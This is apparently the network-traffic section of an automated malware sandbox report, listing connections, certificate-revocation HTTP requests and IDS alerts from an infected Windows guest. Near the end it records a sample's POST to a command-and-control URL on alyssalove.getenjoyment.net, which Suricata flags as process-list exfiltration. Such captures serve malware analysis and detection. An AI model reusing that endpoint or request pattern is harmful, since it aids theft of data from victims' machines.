Network Analysis
TCP Requests
- 192.168.56.103:49603 -> 117.18.237.29:80 (ocsp.digicert.com)
- 192.168.56.103:49604 -> 117.18.237.29:80 (ocsp.digicert.com)
- 192.168.56.103:49605 -> 117.18.237.29:80 (ocsp.digicert.com)
- 192.168.56.103:49607 -> 117.18.237.29:80 (ocsp.digicert.com)
- 192.168.56.103:49600 -> 182.162.106.50:80
- 192.168.56.103:49608 -> 185.176.43.98:80 (alyssalove.getenjoyment.net)
- 192.168.56.103:49606 -> 23.37.139.27:80 (sv.symcd.com)
- 192.168.56.103:49598 -> 23.74.19.27:80 (sv.symcd.com)
- 192.168.56.103:49599 -> 23.74.19.27:80 (sv.symcd.com)
- 192.168.56.103:49601 -> 23.74.19.27:80 (sv.symcd.com)
- 192.168.56.103:49602 -> 23.74.19.27:80 (sv.symcd.com)
UDP Requests
- 192.168.56.103:55444 -> 164.124.101.2:53
- 192.168.56.103:56376 -> 164.124.101.2:53
- 192.168.56.103:56508 -> 164.124.101.2:53
- 192.168.56.103:57259 -> 164.124.101.2:53
- 192.168.56.103:58285 -> 164.124.101.2:53
- 192.168.56.103:58575 -> 164.124.101.2:53
- 192.168.56.103:58935 -> 164.124.101.2:53
- 192.168.56.103:59012 -> 164.124.101.2:53
- 192.168.56.103:62079 -> 164.124.101.2:53
- 192.168.56.103:62494 -> 164.124.101.2:53
- 192.168.56.103:64714 -> 164.124.101.2:53
- 192.168.56.103:65511 -> 164.124.101.2:53
- 192.168.56.103:137 -> 192.168.56.255:137
- 192.168.56.103:138 -> 192.168.56.255:138
- 192.168.56.103:1900 -> 239.255.255.250:1900
- 192.168.56.103:49152 -> 239.255.255.250:3702
- 192.168.56.103:50368 -> 239.255.255.250:1900
- 52.231.114.183:123 -> 192.168.56.103:123
HTTP Requests

GET 200 http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j%2BApJVk%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j%2BApJVk%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1561
Cache-Control: public, max-age=86400
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:36:55 GMT
Connection: keep-alive

GET 200 http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEFDtZ0JVYUv07T7UI8yTyn0%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEFDtZ0JVYUv07T7UI8yTyn0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: evcs-ocsp.ws.symantec.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1533
Cache-Control: public, max-age=86400
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:00 GMT
Connection: keep-alive

GET 200 http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
REQUEST
GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
RESPONSE
HTTP/1.1 200 OK
Content-Length: 767
Content-Type: application/pkix-crl
Content-MD5: aHL66CiNs0IH2efuNQFX9A==
Last-Modified: Fri, 07 May 2021 05:00:53 GMT
ETag: 0x8D91115179E37D7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9cdb17c9-f01e-008e-7d07-4308d1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 08 Jun 2021 07:37:04 GMT
Connection: keep-alive

GET 200 http://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCED141%2Fl2SWCyYX308B7Khio%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCED141%2Fl2SWCyYX308B7Khio%3D HTTP/1.1
Cache-Control: max-age = 497683
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 01 Nov 2020 00:00:59 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: s2.symcb.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1561
Cache-Control: public, max-age=86400
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:10 GMT
Connection: keep-alive

GET 200 http://sv.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEBLwJ34PIzs5%2BUGbBujN41I%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEBLwJ34PIzs5%2BUGbBujN41I%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: sv.symcd.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1519
Cache-Control: public, max-age=86400
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:14 GMT
Connection: keep-alive

GET 200 http://sv.symcb.com/sv.crl
REQUEST
GET /sv.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: sv.symcb.com
RESPONSE
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 52718
Cache-Control: max-age=172800
Content-Type: application/pkix-crl
Date: Tue, 08 Jun 2021 07:37:15 GMT
Expires: Thu, 10 Jun 2021 07:37:15 GMT
Last-Modified: Mon, 07 Jun 2021 16:58:37 GMT
Server: ECS (tkb/7356)
X-Cache: HIT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 94589

GET 200 http://crl.verisign.com/pca3.crl
REQUEST
GET /pca3.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.verisign.com
RESPONSE
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 23627
Cache-Control: max-age=172800
Content-Type: application/pkix-crl
Date: Tue, 08 Jun 2021 07:37:15 GMT
Etag: "6088ef0c-5ca"
Expires: Thu, 10 Jun 2021 07:37:15 GMT
Last-Modified: Wed, 28 Apr 2021 05:13:48 GMT
Server: ECS (tkb/73A4)
X-Cache: HIT
Content-Length: 1482

GET 200 http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 5
Cache-Control: public, max-age=300
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:19 GMT
Connection: keep-alive

GET 200 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D HTTP/1.1
Cache-Control: max-age = 107819
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 01 Nov 2020 11:33:00 GMT
If-None-Match: "5f9e9cec-1d7"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
RESPONSE
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 3073
Cache-Control: max-age=100959
Content-Type: application/ocsp-response
Date: Tue, 08 Jun 2021 07:37:24 GMT
Etag: "60bdf993-1d7"
Expires: Wed, 09 Jun 2021 11:40:03 GMT
Last-Modified: Mon, 07 Jun 2021 10:48:51 GMT
Server: ECS (tkb/7377)
X-Cache: HIT
Content-Length: 471

GET 200 http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 5
Cache-Control: public, max-age=300
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:24 GMT
Connection: keep-alive

GET 200 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D HTTP/1.1
Cache-Control: max-age = 156719
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 02 Nov 2020 01:03:00 GMT
If-None-Match: "5f9f5ac4-1d7"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
RESPONSE
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4854
Cache-Control: max-age=151336
Content-Type: application/ocsp-response
Date: Tue, 08 Jun 2021 07:37:29 GMT
Etag: "60beb76b-1d7"
Expires: Thu, 10 Jun 2021 01:39:45 GMT
Last-Modified: Tue, 08 Jun 2021 00:18:51 GMT
Server: ECS (tkb/7377)
X-Cache: HIT
Content-Length: 471

GET 200 http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 5
Cache-Control: public, max-age=300
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:32 GMT
Connection: keep-alive

GET 200 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEA3etT%2BVczf76vmMSmFbFJ0%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEA3etT%2BVczf76vmMSmFbFJ0%3D HTTP/1.1
Cache-Control: max-age = 165702
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 02 Nov 2020 03:15:00 GMT
If-None-Match: "5f9f79b4-1d7"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
RESPONSE
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6440
Cache-Control: max-age=160834
Content-Type: application/ocsp-response
Date: Tue, 08 Jun 2021 07:37:33 GMT
Etag: "60bed657-1d7"
Expires: Thu, 10 Jun 2021 04:18:07 GMT
Last-Modified: Tue, 08 Jun 2021 02:30:47 GMT
Server: ECS (tkb/7377)
X-Cache: HIT
Content-Length: 471

GET 200 http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 5
Cache-Control: public, max-age=300
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:37 GMT
Connection: keep-alive

GET 200 http://sv.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEADzAwdvBip42MYbURaknTY%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEADzAwdvBip42MYbURaknTY%3D HTTP/1.1
Cache-Control: max-age = 369537
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Fri, 30 Oct 2020 12:25:34 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: sv.symcd.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1519
Cache-Control: public, max-age=86400
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:38 GMT
Connection: keep-alive

GET 200 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
RESPONSE
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6113
Cache-Control: max-age=150400
Content-Type: application/ocsp-response
Date: Tue, 08 Jun 2021 07:37:41 GMT
Etag: "60beaee4-1d7"
Expires: Thu, 10 Jun 2021 01:24:21 GMT
Last-Modified: Mon, 07 Jun 2021 23:42:28 GMT
Server: ECS (tkb/72AF)
X-Cache: HIT
Content-Length: 471

GET 200 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D
REQUEST
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
RESPONSE
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 2290
Cache-Control: max-age=95474
Content-Type: application/ocsp-response
Date: Tue, 08 Jun 2021 07:37:46 GMT
Etag: "60bde74a-1d7"
Expires: Wed, 09 Jun 2021 10:09:00 GMT
Last-Modified: Mon, 07 Jun 2021 09:30:50 GMT
Server: ECS (tkb/72AF)
X-Cache: HIT
Content-Length: 471

POST 403 http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files
REQUEST
POST /0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 1883
Host: alyssalove.getenjoyment.net
RESPONSE
HTTP/1.1 403 Forbidden
Date: Tue, 08 Jun 2021 07:37:45 GMT
Server: Apache
Vary: Host
Last-Modified: Wed, 19 Sep 2012 23:44:44 GMT
ETag: "7a-4ca1697571300"
Accept-Ranges: bytes
Content-Length: 122
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category
---|---|---|---
TCP 192.168.56.103:49608 -> 185.176.43.98:80 | 2027117 | ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration | A Network Trojan was detected
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts